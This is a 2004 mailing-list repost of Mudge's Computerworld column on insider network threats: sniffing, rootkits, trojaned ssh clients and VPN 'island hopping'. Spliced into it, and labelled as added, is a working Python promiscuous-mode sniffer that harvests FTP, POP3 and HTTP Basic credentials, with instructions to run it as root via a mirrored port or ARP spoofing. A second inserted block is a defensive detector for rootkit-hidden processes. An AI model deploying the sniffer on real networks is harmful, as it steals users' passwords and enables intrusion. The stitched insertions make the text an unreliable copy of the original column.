[ISN] Inside the insider threat

InfoSec News isn at c4i.org
Fri Jun 11 06:20:21 EDT 2004


http://www.computerworld.com/securitytopics/security/story/0,,93757,00.html

Opinion by Mudge
Intrusic Inc. 
JUNE 10, 2004

Six years ago, I warned the U.S. Senate that it was possible to "take
down the Internet in 30 minutes."

There are still critical weaknesses at central points of the public
network. Although those points are more distributed now, remote hosts
can still be harnessed to cause disruption and confusion in much the
way distributed denial-of-service (DDoS) attacks do. That is the
threat model of the Internet as a whole. An Internetwide outage would
affect everyone on the Web, but corporations, organizations and
governments face a further threat model, one whose pain and risk are
far more acute and localized.

One of the oldest of these, and the one that has changed least over
the years, is the insider threat -- hackers who have infiltrated an
internal network and operate there with the access of an insider.
This form of the threat is far more common than attacks or destruction
by actual employees. The infiltration is achieved by the means common
to network interlopers and attackers generally, and, most important,
it is largely missed by existing audit and intrusion-detection systems
(IDS).

Web site defacement, concurrent versions system (CVS) attacks and DDoS
attacks are rarely launched by agents once they are inside an
organization. Such overt attacks would reveal them too easily. Once
inside a network, a hacker's priorities change -- from vandal to spy.

The insider threat is unaddressed by today's IDSs, which are focused
on attacks. Attacks are noisy, so they're rarely used by insiders
intent on remaining invisible inside of a network. Real-world examples
of insiders include Robert Hanssen, the FBI mole; Aldrich Ames, the
CIA mole; and the sleeper terrorist cells inside the U.S. that were
responsible for 9/11. How many lives could have been saved if these
moles and sleeper cells had been discovered earlier?

Over the years, I have found critical systems, such as Supervisory
Control and Data Acquisition/Data Control System components for
utilities companies and large phone-switching systems for
telecommunications companies, compromised by insiders who were camping
out in these networks. Often, the system's critical function was
unknown to the interloper, whose sights were set elsewhere. But many
times control of the critical system was the ultimate goal.

Proprietary source code, microchip design plans and databases full of
personal information continue to end up in the public domain, or in
competitors' hands. Companies and organizations of all shapes and
sizes continue to bear this risk, with little mitigation coming from
the expensive network security defenses they have deployed.

So how do antagonists continue to gain access so easily?

Let's take a closer look at some of the tactics hackers commonly use.


Sniffing, Trojan horses and application back doors

Sniffing is the easiest and most profitable method hackers use to
obtain the legitimate credentials and account information needed to
gain access to an internal network. Sniffing means placing a network
interface into promiscuous mode, in which it passes every frame it
sees up to the host instead of only the frames addressed to it. On a
shared medium (a hub, or a mirrored switch port) that includes the
packets other systems exchange among themselves; on a switched network
the attacker must first steer that traffic to his own port, for
example by ARP spoofing, but the result is the same. Everything that
crosses the wire in the clear is captured, including the usernames and
passwords that protocols such as telnet, FTP, POP3 and HTTP Basic
authentication send unencrypted.
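As an added example (it is not part of the column, nor the author's or Intrusic's code), here is what the promiscuous-mode sniffing just described looks like in practice: a Python sniffer that joins a Linux packet socket to promiscuous mode and pulls FTP, POP3 and HTTP Basic credentials out of the cleartext it sees, the same kind of harvest the ISP example further down reports. The live capture needs Linux and CAP_NET_RAW; the interface name "eth0", and every address and credential in demo(), are made-up assumptions, and the frames are constructed inside the block so the parser can be exercised offline.

```python
# Added example, not from the column: a promiscuous-mode sniffer that pulls
# plaintext credentials (FTP/POP3 USER+PASS, HTTP Basic) out of TCP payloads.
# Live capture is Linux-only (CAP_NET_RAW); the parser runs anywhere on the
# constructed frames in demo(). Interface and address values are assumptions.
import base64
import re
import socket
import struct

ETH_P_ALL, ETH_P_IP, IPPROTO_TCP = 0x0003, 0x0800, 6
FTP_POP3_PORTS, HTTP_PORTS = {21, 110}, {80, 8080}   # USER/PASS dialogs; Basic auth
SOL_PACKET = getattr(socket, "SOL_PACKET", 263)      # Linux packet-socket constants
PACKET_ADD_MEMBERSHIP = getattr(socket, "PACKET_ADD_MEMBERSHIP", 1)
PACKET_MR_PROMISC = getattr(socket, "PACKET_MR_PROMISC", 1)
USER_RE = re.compile(r"^USER\s+(\S+)", re.I)
PASS_RE = re.compile(r"^PASS\s+(\S+)", re.I)
BASIC_RE = re.compile(r"^Authorization:\s*Basic\s+(\S+)", re.I | re.M)


def parse_frame(frame):
    """Decode Ethernet/IPv4/TCP into (src_ip, dst_ip, dst_port, payload); None for
    anything else. Options are skipped via the header-length fields; checksums are
    not verified (a passive sniffer has no reason to)."""
    if len(frame) < 54 or struct.unpack("!H", frame[12:14])[0] != ETH_P_IP:
        return None
    ip = frame[14:]
    ihl, total_len = (ip[0] & 0x0F) * 4, struct.unpack("!H", ip[2:4])[0]
    if ip[9] != IPPROTO_TCP or len(ip) < total_len:
        return None
    tcp = ip[ihl:total_len]
    if len(tcp) < 20:
        return None
    dport, data_off = struct.unpack("!H", tcp[2:4])[0], (tcp[12] >> 4) * 4
    return socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20]), dport, tcp[data_off:]


class CredentialHarvester:
    """USER and PASS arrive in separate segments, so pair them per client->server
    flow; HTTP Basic carries both in one header and is decoded on the spot."""

    def __init__(self):
        self._pending_user = {}    # (src, dst, dport) -> username awaiting its PASS
        self.credentials = []      # (protocol, client, server, username, password)

    def feed(self, frame):
        parsed = parse_frame(frame)
        if parsed is None or not parsed[3]:
            return
        src, dst, dport, payload = parsed
        text, flow = payload.decode("latin-1"), (src, dst, dport)  # latin-1 never raises
        if dport in FTP_POP3_PORTS:
            for line in text.splitlines():
                m = USER_RE.match(line)
                if m:
                    self._pending_user[flow] = m.group(1)
                    continue
                m = PASS_RE.match(line)
                if m and flow in self._pending_user:      # PASS with no USER: ignore
                    proto = "ftp" if dport == 21 else "pop3"
                    self.credentials.append(
                        (proto, src, dst, self._pending_user.pop(flow), m.group(1)))
        elif dport in HTTP_PORTS:
            for m in BASIC_RE.finditer(text):
                try:
                    user, _, pw = base64.b64decode(m.group(1)).decode("latin-1").partition(":")
                except ValueError:                        # malformed base64
                    continue
                self.credentials.append(("http-basic", src, dst, user, pw))


def sniff(ifname, harvester, max_frames=1000):
    """Linux: raw packet socket on ifname, joined to promiscuous mode, feeding every
    frame on the wire to the harvester (assumed call: sniff("eth0", harvester))."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ALL)) as sock:
        sock.bind((ifname, 0))
        # struct packet_mreq { int mr_ifindex; u16 mr_type; u16 mr_alen; u8 mr_address[8]; }
        mreq = struct.pack("IHH8s", socket.if_nametoindex(ifname), PACKET_MR_PROMISC, 0, b"")
        sock.setsockopt(SOL_PACKET, PACKET_ADD_MEMBERSHIP, mreq)
        for _ in range(max_frames):
            harvester.feed(sock.recv(65535))   # promisc membership ends with the socket


def build_frame(src, dst, dport, payload, sport=40000):
    """Constructed Ethernet/IPv4/TCP frame for offline testing (zero checksums)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, IPPROTO_TCP, 0,
                     socket.inet_aton(src), socket.inet_aton(dst)) + tcp
    return b"\xff" * 6 + b"\x00\x0c\x29\x00\x00\x01" + struct.pack("!H", ETH_P_IP) + ip


def demo():
    """Replay constructed traffic (made-up addresses and credentials) through the harvester."""
    h = CredentialHarvester()
    basic = base64.b64encode(b"root:t0ps3cret")
    for frame in (
        build_frame("10.0.0.5", "192.0.2.10", 21, b"USER alice\r\n"),
        build_frame("10.0.0.5", "192.0.2.10", 21, b"PASS hunter2\r\n"),
        build_frame("10.0.0.9", "192.0.2.10", 21, b"PASS orphan\r\n"),    # no USER seen
        build_frame("10.0.0.7", "192.0.2.20", 80,
                    b"GET /admin HTTP/1.0\r\nAuthorization: Basic " + basic + b"\r\n\r\n"),
    ):
        h.feed(frame)
    return h.credentials
```

Run it as root with sniff("eth0", CredentialHarvester()) on a host that actually sees the traffic; on a switched network that means a mirrored port or prior ARP spoofing. Note what the harvester never needs: no exploit and no attack signature, only traffic that a protocol of this era sends in the clear, which is why a network IDS watching for attacks has nothing to alert on.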

Universities and network service providers are prime targets for the
harvesting of accounts and credentials to access the internal networks
of corporations because they have high-speed network connections that
carry substantial amounts of traffic for a multitude of purposes.

Hackers on the inside use a standard set of techniques, collectively
known as rootkits, to remain invisible on compromised systems. These
techniques alter or replace applications, library calls, kernel
interfaces and so on so that files, processes and other system
information that might tip off the company are never shown (the
sniffer's log file and the promiscuous interface itself being the
first things worth hiding).
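One check a practitioner would want against the hiding techniques above, as an added example that is not from the column: a cross-view comparison in Python. ps and ls can be trojaned and readdir() can be hooked, but kill(pid, 0) asks the kernel directly whether a task exists, so a task the kernel confirms and the /proc listing omits is exactly the discrepancy a process-hiding rootkit produces. The approach is the standard one used by tools such as unhide, written here independently; it assumes a Linux host with /proc mounted.

```python
# Added example, not from the column: a cross-view check for tasks a rootkit
# hides from ps. Trojaned tools and hooked getdents()/readdir() filter what the
# /proc listing shows; kill(pid, 0) asks the kernel directly, and a task that
# answers the probe but is missing from the listing is the tell.
import os


def listed_task_ids():
    """PIDs and thread IDs that /proc admits to. Thread IDs are included because
    kill(tid, 0) succeeds for a thread too; a bare PID list would flag every
    thread of a multithreaded process as hidden."""
    ids = set()
    if not os.path.isdir("/proc"):
        return ids
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        ids.add(int(name))
        try:
            ids.update(int(t) for t in os.listdir(f"/proc/{name}/task"))
        except OSError:                  # process exited between the two listings
            pass
    return ids


def task_exists(pid):
    """True if the kernel knows this ID: signal 0 delivers nothing, and EPERM
    (another user's task) still proves existence."""
    try:
        os.kill(pid, 0)
    except ProcessLookupError:
        return False
    except PermissionError:
        pass
    return True


def probed_task_ids(max_pid):
    """Brute-force the ID space with kill(pid, 0); this is the view a rootkit
    cannot filter without hooking the syscall itself."""
    return {pid for pid in range(1, max_pid + 1) if task_exists(pid)}


def hidden_task_ids(listed, probed, confirm):
    """IDs the kernel answers for but /proc does not list, each re-checked with
    confirm(pid) so tasks that started or exited mid-scan are not reported."""
    return {pid for pid in probed - listed if confirm(pid)}


def find_hidden_tasks(max_pid=None):
    """Run the whole check; returns the set of suspicious IDs (empty on a clean
    host, or where /proc is unavailable). max_pid defaults to kernel.pid_max."""
    if not os.path.isdir("/proc"):
        return set()
    if max_pid is None:
        with open("/proc/sys/kernel/pid_max") as f:
            max_pid = int(f.read())
    listed = listed_task_ids()
    probed = probed_task_ids(max_pid)
    fresh = listed_task_ids() if probed - listed else listed   # second look at candidates
    return hidden_task_ids(listed, probed, lambda pid: task_exists(pid) and pid not in fresh)


if __name__ == "__main__":
    print(sorted(find_hidden_tasks()) or "no hidden tasks")
```

Run it as root so that every task is both probed and listed; with the hidepid mount option on /proc, other users' tasks are deliberately absent from the listing and will show up as findings, so read the output with that in mind. A rootkit that also hooks kill() defeats this particular cross-view, which is why real-world tools compare several independent views at once.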

Encryption and communication applications (a trojaned ssh client or
server is the classic case) are often modified by perpetrators to copy
input and output from the controlling terminal into hidden locations
on the system. Variants of these modifications send the copied data
out over the network through covert channels. So while the encrypted
session itself may have been protected on the wire, the modified
endpoint application happily recorded the passwords and commands typed
into it for later retrieval and reuse.

The longer a hacker has control, the more options he has and the more
value he receives. The hacker Fluffy Bunny, for example, was
tremendously successful using these techniques and would then go
public with some of the names and locations of places to which he had
gained access and control. (It's a shame that most people didn't read
the detailed descriptions provided around how the compromises were
conducted.)

Once legitimate credentials are obtained, the need to attack overtly
disappears. No wonder vulnerability scanners and network IDSs do
little to thwart this inside corporate networks: who would deploy a
system that refused access when legitimate credentials are presented?
Remember, too, that the attacks or exploits used to compromise the
first sniffing host most likely happened outside the network, out of
sight of its own sensors.

Here is a real-world example of what an insider compromise can yield.
One day's log from a small sniffer, planted through a back door on an
Internet service provider that will remain anonymous, held 4,466
username/password pairs for roughly 1,000 remote organizations, among
them 104 root accounts, one of which was a master password for the IT
organization of a global company. (Of those thousands, perhaps only 20
accounts belonged to the service provider itself.)

Another method is "island hopping." It targets broadband, Digital
Subscriber Line and dial-up-connected home PCs and rides their virtual
private network connections to gain legitimate remote access to the
internal networks those home systems are authorized to reach. There
are many other ways for hackers to infiltrate networks without
alerting firewalls and IDSs.

Attackers have many ways of getting inside corporate networks. The
insider threat has become an enormous danger to the internal networks
of corporations, organizations and governments. To properly address
this threat, organizations need to move beyond traditional
perimeter-security systems.


In an upcoming column, Mudge will explore options for companies to
combat the insider threat.


Peiter Mudge Zatko is a security expert and chief scientist at
Waltham, Mass.-based Intrusic Inc., which is a security company
focused exclusively on the insider threat.
